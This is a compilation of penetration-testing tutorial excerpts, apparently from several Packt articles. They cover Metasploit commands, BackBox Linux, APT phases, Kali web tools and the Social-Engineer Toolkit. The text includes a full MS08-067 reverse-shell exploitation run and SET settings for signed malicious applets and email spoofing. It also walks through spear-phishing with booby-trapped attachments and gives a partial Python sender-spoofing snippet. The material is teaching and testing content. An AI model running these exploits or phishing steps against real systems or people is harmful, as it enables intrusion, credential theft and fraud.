show nops: This command will display all the available NOP generators.
show options: This command will display the settings and options available for the specific module.
show targets: This command will help us to extract a list of target OSes supported by a particular exploit module.
show advanced: This command will provide you with more options to fine-tune your exploit execution.

We have compiled a short list of the most valuable commands in the following list; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you:

check: To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits.
connect ip port: Works similar to the Netcat and Telnet tools.
exploit: To launch a selected exploit.
run: To launch a selected auxiliary.
jobs: Lists all the background modules currently running and provides the ability to terminate them.
route add subnet netmask sessionid: To add a route for traffic through a compromised session for network pivoting purposes.
info module: Displays detailed information about a particular module (exploit, auxiliary, and so on).
set param value: To configure the parameter value within the current module.
setg param value: To set the parameter value globally across the framework to be used by all exploit and auxiliary modules.
unset param: It is the reverse of the set command. You can also reset all variables by using the unset all command at once.
unsetg param: To unset one or more global variables.
sessions: Ability to display, interact with, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination.
search string: Provides a search facility through module names and descriptions.
use module: Select a particular module in the context of penetration testing.
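Tying a few of these commands together, here is a sketch of a typical console session against the same SMB vulnerability used in the MSFCLI example that follows; the addresses are the ones assumed in that example:

msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
msf exploit(ms08_067_netapi) > exploit

The search, use, set, and exploit sequence shown here is the backbone of almost every console-driven attack in the framework.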
It is important for you to understand their basic use with different sets of modules within the framework.

MSFCLI

Similar to the MSFConsole interface, a command-line interface (CLI) provides extensive coverage of the various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole.

To access msfcli, use the terminal to execute the following command:

# msfcli -h

This will display all the available modes, similar to those of MSFConsole, as well as usage instructions for selecting a particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows:

# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                             Description
   ----                             -----------
   generic/debug_trap               Generate a debug trap in the target process
   generic/shell_bind_tcp           Listen for a connection and spawn a command shell
...

Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for the chosen payload.

Starting Out with BackBox Linux

Packt
17 Feb 2014
11 min read
(For more resources related to this topic, see here.)

A flexible penetration testing distribution

BackBox Linux is a very young project designed for penetration testing, vulnerability assessment, and management. The key focus in using BackBox is to provide an independent security testing platform that can be easily customized, with increased performance and stability. BackBox uses a very light desktop manager called XFCE. It includes the most popular security auditing tools that are essential for penetration testers and security advisers. The suite of tools includes web application analysis, network analysis, stress tests, sniffing, forensic analysis, exploitation, documentation, and reporting.

The BackBox repository is hosted on Launchpad and is constantly updated to the latest stable versions of its tools. Adding and developing new tools inside the distribution requires compliance with the open source community and, particularly, the Debian Free Software Guidelines criteria.

IT security and penetration testing are dedicated sectors and quite new in the global market. There are a lot of Linux distributions dedicated to security, but if we do some research, we can see that only a couple of them are constantly updated. Many newly born projects stop at the first release without continuity, and very few of them keep getting updated. BackBox is one of the newer players in this field, and even though it is only a few years old, it has acquired an enormous user base and now holds second place in worldwide rankings. It is a lightweight, community-built penetration testing distribution capable of running live in USB mode or as a permanent installation. BackBox now operates on release 3.09 as of September 2013, with a significant increase in users, thus becoming a stable community. BackBox is also used significantly in the professional world.

BackBox is built on top of Ubuntu LTS, and the 3.09 release uses 12.04 as its core. The desktop manager environment is XFCE, and ISO images are provided for 32-bit and 64-bit platforms (with availability via Torrents and HTTP downloads from the project's website). The following screenshot shows the main view of the desktop manager, XFCE:

The choice of the XFCE desktop manager plays a very important role in BackBox. It is designed not only to serve slender environments with medium and low levels of resources, but also to cope with very low memory. In the case of very low memory and other constrained resources (such as CPU, HD, and video), BackBox has an alternative way of booting the system without the graphical user interface (GUI), using the command line only, which requires a really minimal amount of resources. With this aim in mind, BackBox is designed to function on pretty old and obsolete hardware as a normal auditing platform. However, BackBox can also be used on more powerful systems to perform actions that require modern multicore processors to reduce the ETA of tasks such as brute-force attacks, data/password decryption, and password cracking. Of course, the BackBox team aims to minimize overhead for the aforementioned cases through continuous research and development. Luckily, the majority of the tools included in BackBox can be run in a shell/console environment, and for the ones which require more interactivity, we always have our XFCE interface where we can access user-friendly GUI tools (in particular, network analysis tools) that do not require many resources.
A relative newcomer to the IT security and penetration testing environment, BackBox saw its first release on September 9, 2010, as a project of the Italian web community. Now on its third major release and close to the next minor release (BackBox Linux 3.13 is planned for the end of January 2014), BackBox has grown rapidly and offers a wide scope for both amateur and professional use.

The minimum requirements for BackBox are as follows:

A 32-bit or 64-bit processor
512 MB of system memory RAM (256 MB in case there will be no desktop manager usage, only the console)
4.4 GB of disk space for installation
A graphics card capable of 800 × 600 resolution (less resolution in case there will be no desktop manager usage)
A DVD-ROM drive or USB port

The following screenshot shows the main view of BackBox with a toolbar at the bottom:

The suite of auditing tools in BackBox makes the system complete and ready for use by security professionals for penetration testing.

The organization of tools in BackBox

The entire set of BackBox security tools is populated into a single menu called Auditing and structured into different subtasks as follows:

Information Gathering
Vulnerability Assessment
Exploitation
Privilege Escalation
Maintaining Access
Documentation & Reporting
Reverse Engineering
Social Engineering
Stress Testing
Forensic Analysis
VoIP Analysis
Wireless Analysis
Miscellaneous

We will run through all the tool categories in BackBox, giving a short description of each entry in the Auditing menu. The following screenshot shows the Auditing menu of BackBox:

Information Gathering

Information Gathering is the absolute first step for any security engineer and/or penetration tester. It is about collecting information on target systems, which can be very useful in starting the assessment. Without this step, it would be quite difficult and hard to assess any system.

Vulnerability Assessment

After you've gathered information by performing the first step, the next step will be to analyze that information and evaluate it. Vulnerability Assessment is the process of identifying the vulnerabilities present in the system and prioritizing them.

Exploitation

Exploitation is the process where a weakness or bug in software is used to penetrate the system. This can be done through the use of an exploit, which is nothing but an automated script designed to perform a malicious attack on target systems.

Privilege Escalation

Privilege Escalation occurs when we have already gained access to the system, but with low privileges. It can also be that we have legitimate access, but not enough to make effective changes on the system, so we will need to elevate our privileges or gain access to another account with higher privileges.

Maintaining Access

Maintaining Access is about setting up an environment that will allow us to access the system again without repeating the tasks that we performed to gain access initially.

Documentation & Reporting

The Documentation & Reporting menu contains the tools that will allow us to collect the information gathered during our assessment and generate a human-readable report from it.

Reverse Engineering

The Reverse Engineering menu contains a suite of tools aimed at reversing a system by analyzing its structure, for both hardware and software.

Social Engineering

Social Engineering is based on a nontechnical intrusion method, relying mainly on human interaction. It is the ability to manipulate a person and obtain his/her access credentials, or information that can lead us to such parameters.
Stress Testing

The Stress Testing menu contains a group of tools aimed at testing the stress level of applications and servers. Stress testing is the action where a massive number of requests (for example, ICMP requests) are performed against the target machine to create heavy traffic and overload the system. In this case, the target server is under severe stress and can be taken advantage of. For instance, the running services, such as the web server, database, or application server, can be taken down (for example, in a DDoS attack).

Forensic Analysis

The Forensic Analysis menu contains a great number of useful tools for performing a forensic analysis on any system. Forensic analysis is the act of carrying out an investigation to obtain evidence from devices. It is a structured examination that aims to rebuild the user's history on a computer device or a server system.

VoIP Analysis

Voice over IP (VoIP) is a very commonly used protocol today, in every part of the world. VoIP analysis is the act of monitoring and analyzing network traffic with a specific analysis of VoIP calls. In this section, we have a single tool dedicated to the analysis of VoIP systems.

Wireless Analysis

The Wireless Analysis menu contains a suite of tools dedicated to the security analysis of wireless protocols. Wireless analysis is the act of analyzing wireless devices to check their safety level.

Miscellaneous

The Miscellaneous menu contains tools that have different functionalities and could be placed in any of the sections we mentioned earlier, or in none of them.

Services

Apart from the Auditing menu, BackBox also has a Services menu. This menu is designed to handle the daemons of the tools, those which need to be manually initialized as a service.

Update

The Update menu can be found in the main menu, just next to the Services menu. It contains automated scripts that allow users to update the tools that fall outside the APT automated system.

Anonymous

BackBox 3.13 has a new menu entry called Anonymous in the main menu. This menu contains a script that makes the user invisible on the network once started. The script configures a set of tools that anonymize the system while browsing and connecting to the global network, the Internet.

Extras

Apart from the security auditing tools, BackBox also has several privacy-protection tools. The suite of privacy-protection tools includes Tor, Polipo, and Firefox in safe mode, configured with a default profile in private-browsing mode. There are many other useful tools recommended by the team, but they are not included in the default ISO image. The recommended tools are available in the BackBox repository and can be easily installed with apt-get (the automated package installation tool for Debian-like systems).

Completeness, accuracy, and support

It is obvious that there are many alternatives when it comes to the choice of penetration testing tools for any particular auditing process. The BackBox team is mainly focused on the size of the tool library, performance, and the inclusion of the tools for security and auditing. The set of tools included in BackBox is subject to accurate selection and testing by the team. Many security and penetration testing tools are implemented to perform identical functions, and the BackBox team is very careful in the selection process in order to avoid duplicate applications and redundancies.
Besides the wiki-based documentation provided for its set of tools, the repository of BackBox can also be imported into any existing Ubuntu installation (or any Debian-derivative distro) by simply importing the project's Launchpad repository into the source list.

Another point the BackBox team focuses its attention on is the size issue. BackBox may not offer the largest number of tools and utilities, but numbers do not equal quality. It has the essential tools installed by default, which are sufficient for a penetration tester. However, BackBox is not a perfect penetration testing distribution. It is a very young project and aims to offer the best solution to the global community.

Links and contacts

BackBox is an open community where everybody's help is greatly welcomed. Here is a list of useful links to BackBox information on the Web:

The BackBox main and official web page, where we can find general information about the distribution and the organization of the team, is available at http://www.BackBox.org/.
The BackBox official blog, where we can find news about BackBox such as release notes and bug-fix notifications, is available at http://www.BackBox.org/blog.
The BackBox official wiki page, where we can find many tutorials on the usage of the tools included in the distribution, is available at http://wiki.BackBox.org/.
The BackBox official forum, the main discussion board where users can post their problems and suggestions, is available at http://forum.BackBox.org/.
The BackBox official IRC chat room is available at https://kiwiirc.com/client/irc.autistici.org:6667/?nick=BackBox_?#BackBox.
The BackBox official repository, hosted on Launchpad, where all the packages are located, is available at https://launchpad.net/~BackBox.
BackBox also has a Wikipedia page, where we can run through a brief history of how the project began, available at http://en.wikipedia.org/wiki/BackBox.

Summary

In this article, we became more familiar with the BackBox environment by analyzing its menu structure and the way its tools are organized. We also provided a quick comment on each tool category in BackBox. This covers the introductory theory regarding BackBox.

Resources for Article:
Further resources on this subject:
Penetration Testing and Setup [article]
BackTrack 4: Security with Penetration Testing Methodology [article]
Web app penetration testing in Kali [article]

Social Engineering Attacks

Packt
23 Dec 2013
6 min read
(For more resources related to this topic, see here.)

Advanced Persistent Threats

Advanced Persistent Threats (APTs) came into existence during cyber espionage between nations. The main motives for these attacks are monetary gain and lucrative information. APTs normally target a specific organization. A targeted attack is the prerequisite for an APT, and the targeted attack commonly exploits a vulnerability in an application on the target. The attacker normally crafts a mail with a malicious attachment, such as a PDF document or an executable, which is e-mailed to an individual or a group of individuals. Generally, these e-mails are prepared with some social engineering element to make them lucrative to the target.

The typical characteristics of APTs are as follows:

Reconnaissance: The attacker is motivated to get to know the target and their environment: specific users, system configurations, and so on. This type of information can be obtained from the metadata of documents published by the targeted organization, which can easily be collected from the target organization's website by using tools such as FOCA, metagoofil, libextractor, and CeWL.

Time-to-live: In APTs, attackers utilize techniques to bypass security and deploy backdoors so that they retain access for a longer period of time and can always come back in case their actual presence is detected.

Advanced malware: Attackers utilize polymorphic malware in APTs. Polymorphic malware generally changes throughout its life cycle to fool AV detection mechanisms.

Phishing: Most APTs start with social engineering and spear phishing to exploit an application on the target machine. Once the target machine is compromised or network credentials are given up, the attackers actively take steps to deploy their own tools to monitor and spread through the network as required, from machine to machine and network to network, until they find the information they are looking for.

Active attack: In APTs, there is a human element involved; not everything is automated malicious code.

Famous attacks classified as APTs include the following:

Operation Aurora
McRAT
Hydraq
Stuxnet
RSA SecurID attacks

The APT life cycle covers five phases, which are as follows:

Phase 1: Reconnaissance
Phase 2: Initial exploitation
Phase 3: Establish presence and control
Phase 4: Privilege escalation
Phase 5: Data extraction

Phase 1: Reconnaissance

There is a well-known saying that a war is half won not only by our own strength, but also by how well we know our enemy. The attacker generally gathers information from a variety of sources as initial preparation, and the same certainly applies to the defender. Information is gathered on specific people, mostly higher-management people who possess important information, on specific events, on possible initial attack points, and on application vulnerabilities. There are multiple places, such as Facebook, LinkedIn, Google, and many more, where the attacker tries to find this information. There are tools that assist here, such as the Social Engineering Framework (SEF), which we have included in the book Kali Linux Social Engineering; another one that I suggest is the FOCA metadata collector. An attack is planned based on the information gathered, so an employee awareness program must be run continuously to make employees aware that they should not highlight themselves on the Internet, and to better prepare them to defend against these attacks.
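To make the document-metadata angle concrete, here is a sketch of a typical metagoofil run against a hypothetical target domain. The flag set varies between metagoofil versions, so treat the exact options as indicative rather than definitive:

# download up to 50 PDF and DOC files indexed for the target domain,
# then extract usernames, paths, and software versions from their metadata
metagoofil -d example.com -t pdf,doc -l 50 -n 50 -o /tmp/docs -f /tmp/results.html

The resulting report often reveals internal usernames and software versions, exactly the kind of detail an APT actor collects during reconnaissance.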
Phase 2: Initial exploitation

A spear-phishing attack is considered one of the most advanced targeted attacks; attacks of this kind are also called advanced persistent threat (APT) attacks. Today, many cyber criminals use spear phishing to initially exploit the machine. The objective of performing spear phishing is to gain long-term access to different resources of the target, for example, government or military networks, or satellite usage. The main motivation for performing such attacks is to gain access to the IT environment and utilize zero-day exploits found during the initial information gathering phase. This attack is considered especially dangerous because the attacker can spoof the sender's e-mail ID when sending a malicious e-mail. A complete example of this, in graphical format, has been included in the book Kali Linux Social Engineering.

Phase 3: Establishing presence and control

The main objective of this stage is to deploy a full range of attack tools, such as backdoors and rootkits, to start controlling the environment and stay undetected. Organizations need to pay attention to outbound connections to deter such attacks, because the attack tools make outbound connections to the attacker.

Phase 4: Privilege escalation

This is one of the key phases in an APT. Once the attacker has breached the network, the next step is to take over privileged accounts to move around the targeted network. The common objective of the attacker is to obtain administrator-level credentials and stay undetected. The best approach to defend against these attacks is to assume that the attackers are inside our networks right now and proceed accordingly, blocking the pathways they would travel to access and steal our sensitive data.

Phase 5: Data extraction

This is the stage where the attacker has control over one or two machines in the targeted network, has obtained access credentials to extend their reach, and has identified the lucrative data. The only objective left for the attacker is to start sending the data from the targeted network to one of their own servers or machines. The attacker then has a number of options for what to do with this data: ask for a ransom and, if the target does not agree to pay the amount, threaten to disclose the information to the public; share the zero-day exploits; sell the information; or disclose it publicly.

APT defense

The defense against APT attacks is mostly based on their characteristics. APT attacks normally bypass network firewall defenses by attaching exploits within content carried over an allowed protocol, so deep content filtering is required. In most APT attacks, custom-developed code or a zero-day vulnerability is used, so no single IPS or antivirus signature will be able to identify the threat; you must rely on less definitive indicators. The organization must ask itself what it is trying to protect, and perhaps it can apply a layer of data loss prevention (DLP) technology. The organization also needs to monitor both inbound and outbound network traffic, preferably for both web and e-mail communication.

Summary

In this article, we learned what APTs are, their typical characteristics, and their life cycle.

Resources for Article:
Further resources on this subject:
Web app penetration testing in Kali [Article]
Debugging Sikuli scripts [Article]
Customizing a Linux kernel [Article]

Web app penetration testing in Kali

Packt
30 Oct 2013
4 min read
(For more resources related to this topic, see here.)

Web apps are now a major part of today's World Wide Web, and keeping them safe and secure is the prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can be small bugs in the code that lead to a security breach. This is where web app penetration testing jumps in and helps you secure your application. Web app penetration testing can be implemented on various fronts, such as the frontend interface, the database, and the web server. Let us leverage the power of some of the important tools of Kali that can be helpful during web app penetration testing.

WebScarab proxy

WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review and modify the requests created by the browser before they are sent to the server. Similarly, the responses received from the server can be modified before they are reflected in the browser. The new version of WebScarab has many more advanced features, such as XSS/CSRF detection, session ID analysis, and fuzzing. Follow these three steps to get started with WebScarab:

To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web application proxies | WebScarab.

Once the application is loaded, you will have to change your browser's network settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008:

Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check Intercept request. Make sure that both GET and POST requests are highlighted on the left-hand side panel. To intercept the response, check Intercept responses to begin reviewing the responses coming from the server.

Attacking the database using sqlninja

sqlninja is a popular tool used to test SQL injection vulnerabilities in Microsoft SQL servers. Databases are an integral part of web apps; hence, even a single flaw in them can lead to mass compromise of information. Let us see how sqlninja can be used for database penetration testing.

To launch sqlninja, browse to Applications | Kali Linux | Web applications | Database Exploitation | sqlninja. This will launch the terminal window with the sqlninja parameters. The important parameter to look for is the mode parameter, -m:

The -m parameter specifies the type of operation we want to perform on the target database. Let us pass a basic command and analyze the output:

root@kali:~#sqlninja -m test
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer
[-] sqlninja.conf does not exist. You want to create it now ? [y/n]

This will prompt you to set up your configuration file (sqlninja.conf). You can pass the respective values and create the config file. Once you are through with it, you are ready to perform database penetration testing.

The Websploit framework

Websploit is an open source framework designed for vulnerability analysis and penetration testing of web applications. It is very similar to Metasploit and incorporates many of its plugins to add functionality.

To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application Fuzzers | Websploit. We can begin by updating the framework.
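Once the browser proxy settings are in place, a quick way to confirm that WebScarab is actually listening on 127.0.0.1:8008 is to push a request through it from the command line; the URL below is just a placeholder:

# send a request through the intercepting proxy
curl -x http://127.0.0.1:8008 http://www.example.com/

With Intercept request checked, the request should appear in WebScarab's Proxy tab and wait there until you release or modify it, which confirms the interception chain is working before you start testing the real target.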
Passing the update command at the terminal will begin the updating process as follows:

wsf>update
[*]Updating Websploit framework, Please Wait…

Once the update is over, you can check out the available modules by passing the following command:

wsf>show modules

Let us launch a simple directory scanner module against www.target.com as follows:

wsf>use web/dir_scanner
wsf:Dir_Scanner>show options
wsf:Dir_Scanner>set TARGET www.target.com
wsf:Dir_Scanner>run

Once the run command is executed, Websploit will launch the attack module and display the result. Similarly, we can use other modules based on the requirements of our scenarios.

Summary

In this article, we covered the following sections:

WebScarab proxy
Attacking the database using sqlninja
The Websploit framework

Resources for Article:
Further resources on this subject:
Installing VirtualBox on Linux [Article]
Linux Shell Script: Tips and Tricks [Article]
Installing Arch Linux using the official ISO [Article]

Social-Engineer Toolkit

Packt
25 Oct 2013
11 min read
(For more resources related to this topic, see here.)

Social engineering is the act of manipulating people into performing actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or to some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintentional malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked into revealing his/her login information via a fake login/phishing page.

The Social-Engineer Toolkit (SET) is designed to perform such tricking activities. Just as we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the aspects of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering.

Getting started with the Social-Engineer Toolkit (SET)

Let's start our introductory recipe about SET, where we will be discussing SET on different platforms.

Getting ready

SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both a GUI version, which runs through the browser, and a command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article.

How to do it...

To launch SET on BackTrack, start the terminal window and pass the following path:

root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set
Copyright 2012, The Social-Engineer Toolkit (SET)
All rights reserved.
Select from the menu:

If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use. The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit.

How it works...

SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET; Apache is typically considered the preferred server while working with SET.

There's more...

Sometimes, you may have an issue upgrading to a new release of SET in BackTrack 5 R3. Try out the following steps:

You should remove the old SET using the following command:

dpkg -r set

We can remove SET in two ways. First, we can trace the path to /pentest/exploits/set, make sure we are in the directory, and then use the rm command to remove all files present there. Alternatively, we can use the method shown previously.
Then, for reinstallation, we can download a fresh clone using the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit set/

Working with the SET config file

In this recipe, we will take a close look at the SET config file, which contains the default values for the different parameters used by the toolkit. The default configuration works fine for most attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file.

Getting ready

To launch the config file, move to the SET directory and open the set_config file:

root@bt:/pentest/exploits/set# nano config/set_config

The configuration file will be launched with some introductory statements, as shown in the following screenshot:

How to do it...

Let's go through it step by step.

First, we will see what configuration settings are available for us:

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as SET picks up payloads and exploits from the framework:

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

Ettercap is a multipurpose sniffer for switched LANs. The Ettercap settings can be used to perform LAN attacks such as DNS poisoning and spoofing, and these options turn Ettercap on or off and point SET at its installation, depending on your needs:

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF

The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF.

The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack:

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

We will discuss this attack vector in detail in a later recipe (the spear-phishing attack vector); it also requires the JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail:

SELF_SIGNED_APPLET=ON

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/port forwarding, and it allows you to connect to the external Internet. The following setting is used to set up the Apache web server to perform web-based attack vectors.
It is always preferred to set it to ON for better attack performance:

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET, so it is recommended to keep this flag OFF:

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF

The following setting can be used to build a self-signed certificate for web attacks, but the browser will display a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user:

# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF

The following setting is used to enable or disable the Metasploit listener once the attack is executed:

# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
AUTOMATIC_LISTENER=ON

The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase penetration testing performance:

# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
# OR THE OTHER ATTACK VECTORS.
METASPLOIT_MODE=ON

These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the toolkit.

How it works...

The SET config file is the heart of the toolkit, as it contains the default values that SET will pick up while performing various attack vectors. A misconfigured SET file can lead to errors during operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file.

Working with the spear-phishing attack vector

A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to specific, targeted user(s). In order to spoof your own e-mail address, you will require a sendmail server; change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, it can be installed with the following command:

root@bt:~# apt-get install sendmail
Reading package lists... Done

Getting ready

Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works. In order to mitigate these types of attacks, recipient e-mail servers deploy gray-listing, SPF record validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain suggests. For example, if a spoofed e-mail address, <richyrich@gmail.com>, arrives from the IP 202.145.34.23, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in an RBL/SURBL list.
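To make the reverse-lookup idea concrete, here is a minimal Python sketch of our own (not part of SET) that resolves a sending IP back to a hostname and checks whether it belongs to the claimed domain. The IP and domain are the illustrative values from the paragraph above; real mail servers combine this with SPF, DKIM, and RBL checks:

import socket

claimed_domain = "gmail.com"     # domain taken from the From address
sending_ip = "202.145.34.23"     # IP the mail actually arrived from

try:
    # Reverse lookup: map the IP back to a hostname via its PTR record
    hostname, _, _ = socket.gethostbyaddr(sending_ip)
except socket.herror:
    hostname = None  # no PTR record at all is itself suspicious

if hostname and hostname.endswith(claimed_domain):
    print("PTR record matches the claimed domain")
else:
    print("Mismatch -- likely spoofed:", hostname)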
As the spear-phishing attack relies heavily on user perception, the attacker should reconnoiter the content that is being sent and ensure that it looks as legitimate as possible. Spear-phishing attacks are of two types: web-based content and payload-based content.

How to do it...

The spear-phishing module has three different attack vectors at our disposal. Let's analyze each of them.

Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options include setting up a VNC server, executing the payload and starting a command shell, and so on. The next few steps are starting the sendmail server, setting a template for the malicious file format, and selecting a single or mass-mail attack. Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

set:phishing>1
set:phishing> From address (ex: moo@example.com):bigmoney@gmail.com
set:phishing> Flag this message/s as high priority? [yes|no]:y

Setting up your own server may not be very reliable, as most mail services use a reverse lookup to make sure that the e-mail was generated from the same domain as the sender address.

Let's analyze another attack vector of spear-phishing. Creating a file format payload is the attack vector in which we generate a file containing a known vulnerability and send it via e-mail to our target. MS Word-based vulnerabilities are preferred, as it is difficult to detect whether such documents are malicious, so they can be sent as attachments to an e-mail:

set:phishing> Setup a listener [yes|no]:y
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

At last, we are prompted on whether we want to set up a listener. The Metasploit listener will begin, and we will wait for the user to open the malicious file and connect back to the attacking system. The success of e-mail attacks depends on the e-mail client that we are targeting, so a proper analysis of this attack vector is essential.

How it works...

As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail contains a malicious attachment, which exploits a known vulnerability on the target machine and provides shell connectivity back to the attacker. SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
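To illustrate what SET's sendmail option is doing under the hood, here is a minimal, hedged Python sketch that hands an arbitrary From header to a mail relay. The relay address and all mailbox addresses are placeholders of ours, and it assumes a local sendmail/open relay listening on port 25; point it only at servers you are authorized to test:

import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "bigmoney@gmail.com"    # spoofed sender (placeholder)
msg["To"] = "victim@example.com"      # placeholder target
msg["Subject"] = "Quarterly report"
msg["X-Priority"] = "1"               # flag the message as high priority
msg.set_content("Please review the attached report.")

# SMTP itself does not verify the From header; reverse lookup, SPF,
# and RBL checks on the receiving side are what catch the mismatch.
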